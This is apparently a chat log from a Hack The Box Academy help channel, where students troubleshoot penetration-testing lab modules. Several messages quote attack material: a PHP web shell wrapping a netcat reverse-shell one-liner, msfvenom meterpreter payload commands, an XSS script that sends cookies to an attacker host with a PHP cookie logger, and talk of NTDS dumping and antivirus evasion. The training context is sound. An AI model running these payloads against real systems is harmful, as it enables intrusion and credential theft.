Not sure HTB has a module on that.
:/ any other source?
Intro to Hardware attacks covers this.
Ok
I've been waiting for 10 mins + on a specific IP to pop up in my responder output for "NTLM Relay" module (first practical type question) - is this expected?
ty
Np. Did you get it sorted out?
yeah. im happy now
Probably not, but hard to say. You should include the section you're on to get better help. Sometimes you need to coerce with NTLM attacks.
I've got it in analyse mode & grepped for that IP in the log output & haven't received anything, I'll reset it..
hello
Does anyone know WCVS?
I am getting this error:
./go/bin/Web-Cache-Vulnerability-Scanner -u http://94.237.54.170:56841/ -sp language=en -gr
WCVS v1.0.0 started at 2024-09-28_22-46-11
Exported report ./2024-09-28_22-46-11_WCVS_Report.json
error (wordlists/headers: open wordlists/headers: no such file or directory)
@hot owl is this from a module?
A restart fixed this.
I'm kinda stuck at the intro to whitebox pentesting - skill assessment. Is anyone available for help?
Should be added that it's Q2 🙂
Quick question: doing the AD Lab I right now.
I'm extracting files to my attack host through the RDP share (xfreerdp shared disk) and it's AWFULLY slow (355KB/s). Any idea how to improve that, or faster ways to exfiltrate files?
Just thinking that this could drive me crazy during an exam...
Yeah, the RDP drive is very slow, use something else like HTTP.
Ok thanks!
Hi there! I'm just starting out with CDSA, yet already stuck with the "Incident Handling Process | Detection & Analysis Stage (Part 2)" question... pls! Would anyone give me a hint on that?
Can I dm you? In regards to command injection skills assessment?
Yes sure

Hey, I've been stuck for 2 days on the Custom Wordlist section of the Brute Force module. Can someone help me a little bit, because I don't really understand the question...
Hey, in the Linux Priv Esc section,
the logrotten part, I try to run a command to get a shell connection:
./logrotten -p ./payload ./backups/access.log
But I get an error saying version GLIBC_2.34 NOT FOUND. ANY HELP?
make sure you understand what the sharpup output means
aight
It's just telling you to brute force the login.
Did I send you a response earlier regarding this one? If so, you can DM me.
Why not try to make your own MSI?
Well yeah my answer was to enumerate more, lol.
Like I said you can DM if you'd like.
type shi
mhmm, when I make my own MSI:
Hey guys. I'm currently working on the module "Getting Started", Nibbles - Initial Foothold. I run ip a and I put my tun0 address in this command:
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc my_ip 9443 >/tmp/f"); ?> . I uploaded the file, saved the changes, and now I'm trying nc -lvnp 9443 but it doesn't show anything, it just keeps listening. Shouldn't it show this:
listening on [any] 9443 ...
connect to [my_ip] from (UNKNOWN) [10.129.42.190] 40106
/bin/sh: 0: can't access tty; job control turned off
You got the wrong IP or port then.
are you able to click through that and still execute it?
I'm just using the port HTB uses.
What about the IP?
I think it worked, I managed to connect with the password I added on Administrator, but the IP expired. Go try again.
Try restarting the machine then; if that doesn't work then it's definitely your command.
still the same
Should I use another port?
Is tun0 your VPN IP?
and you changed my_ip in the netcat command (nc)?
Yes, and how can I see what my VPN IP is?
Actually I just blindly used tun0 because it said so.
type ip a in the terminal and look at your adapters
lo enp0s3 tun0
OK, so when you made your PHP did you replace my_ip with the tun0 IP?
certainly
hard to say without seeing the actual code and command
the port matches your netcat listening port?
yep
nc -lvnp 9443
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc my_ip 9443 >/tmp/f"); ?>
did you navigate to your page
if the ip and port are correct then something else is wrong, maybe go through all the steps again
I mean, all I have to do is log in to admin.php (which I did), go to Plugins -> My Image, upload the PHP file and then netcat.
I need help with the ffuf module. I think my answer is right but the question keeps saying it's wrong. I don't get it. Where do I need to write or open a ticket?
Okay, solved it.
Hey, I just noticed I can't connect to the SSH server in the Web section of the Login Brute Forcing module.
Does someone have an idea of a possible fix? Or a workaround solution?
Web Proxies § ZAP Fuzzer
Hint says to look for a response with a different Content-Length, but ALL responses have a Content-Length of 410. Why? any ideas?
Are you using the md5 hash processor and on the correct page?
MD5 hash processor yes, and trying on the /skills/ page, why? Is there another page I need to brute force to test it on?
no just making sure
Well, what else is there? Did a search for this module on this channel and noticed that someone else was mentioning a missing character in the cookie; does that need to be cracked offline before another fuzz is attempted? And what about the cookie itself; no mention about it needing to be edited into the header either, which is strange considering it makes one wonder how ZAP is able to authenticate with it.
And tried without making any header modifications at all; again, nothing. A different size (246 bytes) but the responses are still all that size; there's no mix of 246 and any other response size. Again, why?
could be any number of reasons really, maybe just go over the section again and confirm everything is set correctly
just sounds like something isn't setup correctly
Fuzz location: check.
Payload: check (have top-usernames-shortlist.txt saved as a Custom File Fuzzer so I don't need to keep providing the full path to it every single time).
Processor: MD5 hash (check).
Options: defaults, because the module didn't tell me to make any changes to them.
So, what is wrong with this setup exactly?
Do I need to set the Set-Fetch-Dest, Set-Fetch-Mode and Set-Fetch-Site options that are mentioned in the module screenshots but that ZAP doesn't set at all?
I'm also noticing a Priority header, which is set by ZAP but isn't set in the screenshots the module provides, so if there's a ZAP setting to force it to set different headers than the ones it's setting, it would be appreciated.
Is there a setting I need to change in ZAP to tell it to find the cookie-hashed username?
idk, I just tried it with all the correct settings and got it right away
there was one length clearly longer than the others
I did it with Burp though. I have to go to the store so I don't have time to set up ZAP right now.
should be pretty similar though just make sure you're doing what the question asks and it should work
Again:
- Payload: top-usernames-shortlist.txt
- Processor: MD5 Hash
What do I need to set in Options to make this work? Because that's the only problem at this point.
Can someone help me with the Custom Wordlist section in the Login Brute Forcing course? I tried several username lists and password lists, but I didn't crack it.
Did I do something wrong?
If you can drop the link to the section you're on, I'll take a look at my notes.
Retries on I/O Error? Max Errors Allowed? Follow Redirects? Hello?
Tried enabling Follow Redirects; it too was nothing.
Never mind, I solved it, I was just too stupid to read the whole text again (did the module in the past but they made some changes and I tried the old version of it) 😭
Decided to manually edit the headers to make them match the headers in the headers in the module. Again, still nothing.
If you want to DM screenshots of what you have on your end, I can take a look at them and see if anything is off from my notes.
Preparing them; hold on
All good I have some time.
Done
Hi, I have a problem with a specific question in the module JavaScript Deobfuscation: the answer (flag) seems to be right but the server won't accept it.
It would be helpful if someone could test it.
Did you add HTB{} to it?
you don't need to post the flag in here
https://academy.hackthebox.com/achievement/1267476/15 || I finaly start to take action towards my goal
In https://academy.hackthebox.com/module/116/section/1169
I found the password for the "mssqlsvc" user. However when I try to log in using either sqlcmd or impacket-mssqlclient it doesn't work.
I even tried the following from the solutions part:
"sqlcmd -S STMIP -U .\mssqlsvc" and it does not work either (login error in both cases). Has anyone a clue of what would be the issue?
Yes, I tried every possible input layout.
thanks for the help
Actually '-windows-auth' is needed for the Impacket approach. Problem solved.
Idk if this is the appropriate place to ask, but can someone explain to me what exactly a nameserver is?
What I understand is that it is the record that tells you the IP/FQDN of the actual DNS server that has the DNS records, but what I am not getting is how these nameservers' FQDNs are themselves resolved.
through dns records for the domain
Like when doing
dig axfr inlanefreight.htb @ns1.inlanefreight.htb
How is it getting the IP of ns1?
In that instance, it's because you specified ns1. in your /etc/hosts file.
when a domain is registered the registrant specifies a set of authoritative DNS servers, those are the servers responsible for storing the DNS records for the domain
but isn't that ip corresponding to inlanefreight.htb itself?
no, the ip you put in /etc/hosts corresponds to the host you pair it with in /etc/hosts
When a DNS request from a computer is made, the computer will first check itself to see if that is the host being called. After that it checks the hosts file, then it reaches out to the DNS server. So it's obtaining the host from the IP you set in the hosts file.
And these are called nameservers right?
the authoritative dns servers are a type of nameserver
What I am not getting is that when I get the ip from htb for instance and I see that port 53 has a dns, does that means that ip is a nameserver since it stores dns records?
no. any app can be running on port 53, it doesn't really mean anything unless the service running on that port is something that responds to dns requests, which by default is what's used for port 53
Also, what is the process of assigning a specific host name to an ip address like when we do for boxes on htb main platform?
I mean yeah, ik, I meant like a bind9 server on port 53.
May I DM anyone for this module: Shells & Payloads > PHP Web Shells?
just ask here
Module: Shells & Payloads > PHP Web Shells
Q/ Use what you learned from the module to gain a web shell. What is the file name of the gif in the /images/vendor directory on the target? (Format: xxxx.gif)
When I uploaded WhiteWinterWolf's PHP Web Shell and intercepted it with Burp Suite to change the Content-Type from application/x-php to image/gif, and now I try to use the web shell,
https://ip/images/vendor/connect.php didn't work.
Have you modified the IP and port in the php file to match your IP (VPN or pwnbox) + port you use for your netcat listener?
I used ||msfvenom -p php/meterpreter/reverse_tcp|| for that one. Worked like a charm.
ahhh, it's not reverse
and it's working; there were some lines that didn't count
I tried again with copying the raw file and it works
I used msfvenom to create a shell and reverse it to my Meterpreter, then I found the user and the password for sr*****. I'm stuck here, can't do anything. I tried to create a PSSession but that opens a new PowerShell and I can't do anything with it. I tried Get-SQLQuery also, that didn't work, it just freezes. What am I missing here?
which skill assessment
DM @rocky estuary
The AD one, the first one.
sr* user?
have you tried using the credentials across the network
I tried to create a PSSession, that didn't work, and also tried Get-SQLQuery, that didn't work either.
What about netexec?
Has the proxyshell exploit in the Vulns section under Exchange in the AD path worked for anyone? Just dies for me after a long time
What does it do? Is this mentioned in the module?
it's the maintained fork of crackmapexec
We know it is, so why won't this imported payload processor script show up in the ZAP Fuzzer script drop-down menu like it's supposed to?
For context @safe star @proper oar this is in relation to Question 3 of the Web Proxies skills assessment. I'm trying to add a script to allow for the automatic encoding (not decoding) of ||Base64|| into ||ASCII Hex|| as part of the Web Proxies skills assessment. ZAP recognizes that the script has been successfully imported, but the fuzzer doesn't.
Where is the correlation?
^
I also don't remember using a script for payload processing.
What other way is there? Because although ZAP does come with an ASCII hex encoder/decoder, the ZAP fuzzer doesn't.
so use another tool
A crippleware tool?
you'll find the community version of burp is quite capable
Yeah, I used Burp for that too.
There are also two tools imo that a company should pay for the pro version of, for pentesting: Burp Suite and Nessus.
Real, imagine pentesting web apps without Burp Pro.
Anyone moved to caido yet?
caido is still missing a lot of features last time I tried it
It's developing pretty quickly.
I'm actually using Burp CE and paying Caido for support :p
That way we put pressure on Burp to either lower the prices of Pro, or include more features in CE to be competitive :p
For the gobuster directory finder, what's the shortest wordlist? The one provided (usr/share/dirb/wordlists/common.txt) doesn't exist.
I can only find usr/share/dirbuster/wordlists/ and it doesn't contain a common.txt
Wait what time is it rn my phone won’t show
I tried using directory-list-2.3-small but it still takes super long for it to fully complete.
Time is relative but 1pm +8GMT
You can try running locate for the wordlist; iirc this is the same one:
usr/share/seclists/Discovery/Web-Content/common.txt
Ahhh
Actually, time passes more slowly for objects moving close to the speed of light or in strong gravitational fields (time dilation). This means time is actually objective, a physical reality that exists independently of human perception.
Hi,
Module: Attacking Common Applications
Section: WordPress - Discovery & Enumeration
Section link: https://academy.hackthebox.com/module/113/section/1100
I am not able to find the plugin:
Perform manual enumeration to discover another installed plugin. Submit the plugin name as the answer (3 words).
I have checked categories, archives, author, search pages source code. Can anybody give any hint please?
Enumerate the website and not just the home page
I have checked other pages as well. I tried clicking links present on the home page that sends requests with various query parameters. I have checked ||view-source:http://blog.inlanefreight.local/?cat=1||, ||view-source:http://blog.inlanefreight.local/?m=202108||, ||view-source:http://blog.inlanefreight.local/?author=1||, ||view-source:http://blog.inlanefreight.local/?s=ship|| but none of them reveals any new plugin.
did you grep for "plugins" on each page
Keep digging, there are other pages
yes.
Okay
It's there, just easy to miss. Look at every highlighted word.
I checked one more ||http://blog.inlanefreight.local/?feed=rss2|| but same behavior. I am not able to find the plugin name 😦
Hey guys, do you know a good course or blog post or something else where you can learn to make your own payloads?
Hey, in the Linux Priv Esc section, the logrotten part, I try to run a command to get a shell connection: ./logrotten -p ./payload ./backups/access.log But I get an error saying version GLIBC_2.34 NOT FOUND. ANY HELP?
What type of payloads
Like reverse shells,
so I can craft my own
and I can understand what happens.
Also a little question about archiving a payload: archiving is just like crafting it with compression, obfuscation, putting a password on it etc. to bypass antiviruses, right?
Hii
There's a reverse shell payload for the majority of tools you can think of; the best thing to do is just break the command down and understand what it does.
It's gonna get detected once unzipped.
Yeah, but not when you set a password on the zip?
I mean, that's what I saw in the module.
What is the password going to do though?
It's just going to stay like that until unzipped.
What module?
Hello, I'm scanning a machine in the Job Role path where the question is "Perform an Nmap scan of the target. What does Nmap display as the version of the service running on port 8080?"
I ran a scan on the machine but this doesn't show the version of the service running on port 8080. It just shows "Apache tomcat".
Hi All, First time posting: Nice to meet you all.
in the module: Windows Attacks & Defense
The module keeps making reference to a dictionary for hashcat called password.txt. Forgive my ignorance, but where do I find this dictionary? I have been using my own/john and I assume it would be faster to use the one they reference, but I can't find it.
You looked in the resources provided by htb at the top right of the section page ?
Use -sC -sV
I got an answer. It was just "Apache Tomcat". I was thinking that it would be some kind of number. Is that not the meaning of version? Or am I thinking the wrong way?
Unfortunately no resources are provided in that module.
I didn't do this module, try with rockyou lol
Fun fact, u can also do it like -sCV
Basically what I'm doing currently, just wanted to know if anyone had a location for the file mentioned in the module.
I think Apache Tomcat hides its version for security reasons; you can see the version if you go to the site.
Module: Windows Privilege Escalation
Section: Initial Enumeration
I see less permissions when I run the command whoami /priv in a regular PowerShell window compared to when I right click PowerShell and click "Run as Administrator". In both cases when I run just whoami, it returns winlpe-srv01\htb-student.
Can someone please explain why more permissions show in the window that's being "Run as Administrator"?
FYI, I ran net localgroup Administrators, and the output doesn't list winlpe-srv01\htb-student as part of the Administrators group, so now I'm confused how I was able to even run PowerShell as Administrator.
Administrator
helpdesk
htb-student_adm
mrb3n
sccm_svc
secsvc
Hello, in this question I ran the command and it's taking very long, it says remaining about 50m. Am I doing it correctly? Can I say the command here or no?
Important to recognize the difference; use the top 10000 ports or whatever it's called, --top-ports 10000 I think the modifier is.
-sT -p-
OK, yeah, it's the port part. Try reducing the number of ports; leave the one you've got going and start a new one.
Hey guys, I know the OSINT: Corporate Recon module is not part of the CPTS but do you think it's worth the cubes to get it? To improve my recon methodology.
So --top-ports 10000?
Scanning all ports takes a WHILE; add in the TCP 3-way handshake and you're compounding it.
Module: Pivoting, Tunneling, and Port Forwarding
Section: Meterpreter Tunneling & Port Forwarding
Question 2 - Segmentation Fault on the pivot host and meterpreter session closes immediately upon executing the elf binary on the pivot host. What am I doing wrong?
I've checked and double checked all params.
Yeah, something like nmap ... --top-ports 10000. I'm double checking that syntax, I'm pretty sure that's it though.
I think IppSec uses that option as well to speed up the scans on a preliminary.
Or maybe I picked that up somewhere else, but it speeds up the scan considerably while still scanning valuable ports.
Imma scan and see if it gives me the correct answer.
It might be --top-ports 1000 (someone here told me there's another cmd that is inclusive of this). Let me spin up my Kali and check my alias.
I think you meant -F.
Fuckin broke my Kali VM a few weeks ago trying to be a cool guy, ain't wanted to touch the thing ever since.
That's okay, imma try something else.
Yeah, it's similar to -F, but that only does the top 100.
you can start there though that may be advisable
Yeah, start low and work your way up; 65k port scans plus TCP connect take ages.
Here's what my nmap alias looks like for actual boxes, just to give an idea: nmap -sC -sV --top-ports 1000 -Pn 10.10.11.22 -oX - | nmap-formatter html > ~/r/blazorized/blazorizedNmap.html
I think the nmap-formatter part may be redundant? There might be a way to get that output with just straight nmap, but that plugin helps colorize it and stuff. I get tunnel vision looking at nmap output so I use that.
The -F gives me 7 ports and the highest is 445, which is wrong. Imma try top 1000.
got it thank you
nmap -sC -sV (IP) --top-ports 1000 -Pn -oX target.xml
OK, so keep in mind that -F and --top... don't give the HIGHEST ports.
They give the most common or popular ones.
right thank you
Module: Active Directory Trust Attacks
Section: Abusing SQL Server Links
I am unable to RDP into the machine when I use the provided credentials (Administrator:HTB_@cademy_adm!). I also tried to PSexec into the machine but I keep getting Login failure (so likely linked to the provided creds). Can someone check the config of the box please? I've also provided the logs from RDP and Psexec:
[12:05:24:838] [47796:47797] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[12:05:24:838] [47796:47797] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[12:05:24:838] [47796:47797] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
Password:
[-] SMB SessionError: code: 0xc000006d - STATUS_LOGON_FAILURE - The attempted logon is invalid. This is either due to a bad username or authentication information.
The credentials for Jimmy & htb-student are provided in the section along with the RDP command.
ok thank you, let me give it a go
Module: Pivoting, Tunneling, and Port Forwarding
Section: Meterpreter Tunneling & Port Forwarding
Question 2 - Segmentation Fault on the pivot host and meterpreter session closes immediately upon executing the elf binary on the pivot host. What am I doing wrong?
I've checked and double checked all params.
Please send the msfvenom command you are using to generate the payload.
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<My IP> -f elf -o backupjob LPORT=8080
Maybe the issue isn't with the payload. Did you configure the listener properly?
Followed this exactly.
I used the below creds and I still can't RDP into ACADEMY-ADTRUST-CFSQL01:
Do you trust the above certificate? (Y/T/N) Y
[12:23:54:796] [57281:57282] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[12:23:54:796] [57281:57282] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[12:23:54:796] [57281:57282] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[12:23:54:796] [57281:57282] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
```
┌──(root㉿kali)-[/home/kali/Desktop/Academy]
└─# xfreerdp /u:htb-student /p:'HTB_@cademy_stdnt!' /v:10.129.86.205 /dynamic-resolution /drive:linux,/tmp
[12:24:14:666] [57486:57487] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[12:24:14:666] [57486:57487] [WARN][com.freerdp.crypto] - CN = SQL01.inlanefreight.ad
[12:24:14:870] [57486:57487] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[12:24:14:870] [57486:57487] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[12:24:14:870] [57486:57487] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[12:24:14:870] [57486:57487] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
```
Just checked and it's working fine on my end. Did you wait for 2-3 mins after spawning the target?
no, why do I have to wait 2-3 mins?
did your target expire?
ping the target? also svcs take a few minutes to boot on windows boxes, that's why you wait a few
It takes approx 2-3 mins for the VM to be completely UP along with the Domain Controller
ok let me spawn it again. I will keep this in mind
could i get help with pivoting? followed the guide to a T but still get errors after resetting the machine
Which IP address are you using?
10.10.15.15
my machines IP when connected via VPN
you can put tun0 there, i believe. someone here showed me that. make life a lil easier.
Can you send the error that you get when you execute backupjob?
Segmentation Fault (core dumped)
same thing happened
oh no, yeah, i realize you're dealing with a separate issue just wanted to pass along a trick i found helpful
Maybe the issue is that you are using the staged payload linux/x64/meterpreter/reverse_tcp. Can you try using the stageless payload linux/x64/meterpreter_reverse_tcp instead?
You are not setting up the payload when using exploit/multi/handler module.
can you tell if payloads are staged or not? is that in the show info of each payload? or whatever the cmd is
I have another issue when trying to connect to SQL02\SQLEXPRESS:
SQL query: select * from openquery("SQL02\SQLEXPRESS",'select SUSER_NAME()')
Logs:
OLE DB provider "MSOLEDBSQL" for linked server "SQL02\SQLEXPRESS" returned message "Login timeout expired".
OLE DB provider "MSOLEDBSQL" for linked server "SQL02\SQLEXPRESS" returned message "A network-related or instance-specific error has occurred while establishing a connection to SQL Server. Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online.".
Msg -1, Level 16, State 1, Line 0
SQL Server Network Interfaces: Error Locating Server/Instance Specified [xFFFFFFFF].
Completion time: 2024-09-30T05:40:29.2162914-07:00
i saw you had lhost in your cmd, you do have rhost set right? your target? sorry if this has been covered already.
there's no option for rhost
oh i see, right on. just a sanity check
msfvenom payloads follow the format OS/architecture/payload_type. Generally, for a staged payload, payload_type is multiple values separated by /, and for stageless, it's a single value. However, you can accurately find that out by using the msfvenom -l payloads command, which gives a description including whether the payload is staged or stageless.
oh i see, i don't think I've run into those yet. ill have to keep that in mind, alongside the info you mentioned about setting up the multi stage handler, i assume that's something "extra" you have to do?
In the msfconsole, after use exploit/multi/handler, you can see the message Using configured payload generic/shell_reverse_tcp. Before executing run, you should also set up payload as set payload linux/x64/....
ohhhhh ok lemme try
ok, got the right module but now there's no "run" command
@tribal plinth Any chance you can have a look at my previous message. I am unable to run queries on SQL02/SQLEXPRESS from SQL01/SQLEXPRESS
Just checked and it's working fine for me
I ran this SQL query from SQL01\SQLEXPRESS
select * from openquery("SQL02\SQLEXPRESS",'select SUSER_NAME()')
Yup, same!
OLE DB provider "MSOLEDBSQL" for linked server "SQL02\SQLEXPRESS" returned message "Login timeout expired".
Where can I ask some questions to clear my doubts ?
I believe you did use linux/x64/meterpreter/reverse_tcp instead of set payload use linux/x64/meterpreter/reverse_tcp.
OLE DB provider "MSOLEDBSQL" for linked server "SQL02\SQLEXPRESS" returned message "A network-related or instance-specific error has occurred while establishing a connection to SQL Server. Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online."
Run the command in the same order as this.
.
here
What kind of doubts
General problems about like pentest stuff.
Windows PrivEsc - Built in groups
after backing up the entire c drive to e, i still can't take a backup of ntds.dit
made sure that SeBackupPrivilege is enabled
same with the contract file too
replication issue? for the new privs?
what is that
may not come into play here but sometimes the DC needs to replicate changes to user accounts, group memberships, privileges, etc.
didn't get it
like dc needs time to make changes?
i mean surely this is not the case
ok robocopy worked
but still why the first method didn't
ok cracked administrator but can't rdp
logon failure means the creds are wrong
literally from hashcat
tried that too
still logon failure
well that's what the error means
i mean how then??
got the hash from the ntds dump so should be correct right?
i even copied the file from the system32 folder instead of using the one that the author of the section forgot to delete
did u specify the domain alongside the acct?
eagle\administrator vs administrator ?
or w/e it is... eagle.local, contoso.local, etc.
dumped sam too, same hash
Hello Guys Does anyone know where is the channel of HTB CTF because I want to ask questions regarding the CTF ?
no but it is auto detecting it right?
No. it must be specified or a (non domain) Admin acct may be trying to be logged in
nah xfreerdp detects the domain
I'm checking but like I said, that error means the creds are wrong, have you tried using the others?
Lol
Did runas
Also said wrong creds
other users also says wrong
what are the other users
ntds has kerberos tickets but i don't wanna go into that weed
lol literally tried pth for svc_backup with the hash in this file and it didn't work
is this bugged or something?
Hello all. In the "SeImpersonate and SeAssignPrimaryToken" section of the "Windows Privilege Escalation" module I can't connect to the target via RDP (using remmina from pwnbox). Same thing if I use the vpn from a local pc. The error message is "Cannot connect to the RDP server". Any ideas?
seems like the diskshadow is backing up the old file and something weird is going on with copying ntds locally, dcsync does return the right hashes and yea they're different
contact support to sort it out thanks
Module: Cross-Site Scripting
Section: Session Hijacking
I had both script.js and index.php prepped:
script.js
new Image().src='http://VPNIP:PORT/index.php?c'=+document.cookie;
index.php
<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET[c]);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['VPNIP:PORT']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>
I had the php listener running on 0.0.0.0:80 and entered the XSS payload "> (with the VPN ip and port of course) and sent it to the hijacking form.
But after all that, even though I obtained a 200: GET /script, I couldn't obtain the cookie from the target.
Can someone point out some mistakes I missed?
(It's all in the same dir where the php listener is hosted)
hello! someone did the module login brute forcing?
DM me
I am in Skills Assessment Part 1 and i have a question because i can't do it jajaja
can anyone help me, i am not able to open http://gitlab.inlanefreight.local:8081/ and i have already added it to my hosts file, and i am on Attacking Common Applications - Skills Assessment II
i am stupid, it was on some other port
Ok
Hello everyone
Does anyone know anything about this? #modules message
Hi Everyone, I'm working through Password Attacks, the Linux Local Password Attacks section. I have Will's password and am trying to get root's, but have hit a wall. I found the .backups folder, downloaded the .bak files to my attack system and unshadowed them. Sadly my attempts at cracking the hash with hashcat have failed. I used the same command as the reading, am I missing something?
Hi
That's where windows tends to get complicated. In short when UAC is enabled, to protect the system, even if a user has been granted some privileges, they are disabled unless specifically enabled. I know that does not even scratch it and HTB does not explain it much either. For me what really helped understand is this video series, at least first video and first half of the second one, then it gets more advanced.
https://www.youtube.com/playlist?list=PLwb6et4T42ww94O3z5QDNQsO1f_BwhX-L
So are you on this section: Passwd, Shadow & Opasswd?
Yep
For the Cross-Site Scripting (XSS) module and section phishing I got my answer and somehow its getting denied
If no one can help out, I'll have some time in a bit.
Okay, I am using my phone right now since I'm at work, but any direction is helpful
worked! cheers
Jumping in a meeting myself.
what wordlist did you use?
rockyou
This one was a little tricky. While many modules have sections that are totally isolated, the password attacks module has sections that are a little more cohesive.
you can dm me if you still facing problems
Hi, I am stuck on task number 4 while the others were solved https://academy.hackthebox.com/module/218/section/2357
there's another wordlist provided you want to use. it's in resources
This one has definitely proven to be tricky for sure!
Okay, I'll give that a go, thank you!
Thanks for the reference. Will definitely check it out.
I'm out of my meeting, but it looks like you got some assistance.
o
anyone doing the nmap module?
basically nothing is working for me, im trying to find the service versions but im getting filtered and host unreachable
What section are you on? Sometimes terminating and restarting the lab helps. Redownload the VPN too if you're not getting at least a ping response from the target.
download the VPN
Not if you're using pwnbox though, just restart the lab
If you're still having trouble, let me know the section and I can give you a sanity check.
im resetting the box and switching to pwnbox
yeah ping wasn't working, let me check now
guys is there any issues with the academy VPN ?
having a strange issue, when i -sV an ip i don't see the full version name the question is asking for
command?
- output
─# nmap -sV 10.12
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-30 19:38 BST
Nmap scan report for 10.129.131.233
Host is up (0.020s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38
question needs ((debian or ubuntu))
but i only know this after looking it up after 5mins
yo important
a guy has my number and wants to ban me from whatsapp
can I eventually do something about it?
hello! someone did the module login brute forcing?
No
^
@storm elk
Could you please help on CL.TE lab
I have searched through the entire lab, the application doesn't have any functionality.
The application is not considering the reveal_flag parameter when provided as POST body.
So I am not sure where I can find a POST request to perform the CL.TE attack.
https://academy.hackthebox.com/module/191/section/2060
digital forensics module, the windows servers are so laggy, not fun at all to do the module
Dm me and I’ll have a look tomorrow when I’m at my computer
Dm me what you’ve tried etc 🙂
Hey, anyone know how to complete shared object hijacking from the linux privesc section?
I was trying to look for a file named payroll, it's not found anywhere on the target system we get
guys question, are these questions of this module the right questions for the tasks? : https://academy.hackthebox.com/module/18/section/80
I need some tip for Password Attacks Lab - Easy
I found user creds and logged in but i can't find anything root related
Is it normal for a nmap scan to take like a full 2 mins to conduct on this site?
Genuinely going back to THM if this continues to be slow
MSSQL, Exchange, SCCM skill assessment:
Is the GlobalAddress List supposed to be available with MailSniper? I've tried several CVEs in Metasploit and checked that the version appears to be later than those, so I'm assuming that is not the route. I have the passwords to spray based on the document on the desktop seen via RDP, and I found 3 users to name-mash for a User list. Is this all that is needed to proceed?
This is great, needs more views
Yeah great resource, his series on kerberos also good content, everything is explained in detail from high level to which bits are set in wireshark captures
Now, execute the KQL query that is mentioned in the "Wildcards and Regular Expressions" part of this section and enter the number of returned results (hits) as your answer.
how to do it I am unable to get any result
You can DM what you found and I can verify your information.
ok
anyone?
Does anyone know if the module on Using CrackMapExec is going to be replaced with another tool that is being updated, like NetExec or something. I couldn't care less about all the drama surrounding the tool, I just want something that works, and I am having a helluva time getting through the module with a broken tool.
Can’t you just use netexec?
It’s the same tool, just a different name, and maintained
hello guys, is it me or is the file they attached to the module intro to assembly language module : debugging with gdb broken ?? i can't seem to place any breakpoint after the run command ??
That's actually what I am in the process of doing. Are all of the modules the same? or do they have different names?
Not sure, probably the same
But I recommend just using netexec
I'll take a swing at it and see.
Alright, good luck
But the module will for sure have to be updated.
Yeah would be better to just update it with netexec instead
Hi, on Broken Authentication - Brute-Forcing Password Reset Tokens, the question:
"On what do password recovery functionalities provided by web applications typically rely to allow users to recover their accounts?"
..I can't get this one right, it says in the text: "This password-recovery functionality typically relies on a one-time reset token" .. but it seems to be incorrect? 🤔
oh nevermind, got it right now .. at last 😛
Someone did the binary exploitation path here???
Hey in the evading windows AV module. I placed my file in, it says in the log file that it goes undetected but no flag.txt is created
hey, got the flag for the question "Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer." in the Web Server Pivoting with Rpivot module but its incorrect. What mistake am i making?
Could be a space after the last character
for gods sake... thank you!!😄
hey guys im doing the password cracking module, which user and password lists would you recommend to use?
ones provided
and when you make the password mutations, follow the guide and save the mutated passwords. Learned this the hard way for that module lol
shells and payloads skills assessment question 2, i tried using a webshell and changing the content type to .war using burpsuite, it said FAIL - File uploaded must be .war
can someone tell me why this method did not work
is it because Tomcat underlying technology is Java
It’s not checking the content type
Its checking for real war files
how did you come to know that
i solved the question but i couldn't trick it into thinking it was one
file upload module will teach you the ways
You could’ve just uploaded a real war file with no extra problems
yea i created a revshell using .war after, but my initial thought was to bypass restrictions using burp and upload a webshell and see if it worked
Attacking with Ffuf § Value Fuzzing
ID is being correctly filtered out by response size, but when I go to paste the fuzzed ID into the browser (i.e. by polluting the id= parameter), the flag isn't returned. Do I need to use "curl -X POST" to actually get it or something?
I actually filtered by response size and got back an ID that returned a different response size, but when I try to pollute the parameters with that ID in Chrome, again, nothing. Why?
what do you mean?
If I try to manually type http://admin.academy.htb:REDACTED/admin/admin.php?id=REDACTED into Chrome's address bar after successfully having fuzzed the value, it still says I don't have access.
You're probably doing a GET request or something. I forced a POST request via Burp Suite and was able to see the flag in the browser.
Just used curl myself and now it's working.
yeah it's easier with curl
Hey y'all!
I'm in Login Brute Forcing - Custom Wordlists.
I'm using the hydra command as shown in the module, but it's not working.
I even used some modifications, and I'm getting nothing!
Has anyone completed this module? It's the updated version.
If you've completed it, can you give me some pointers?
I've been trying to use
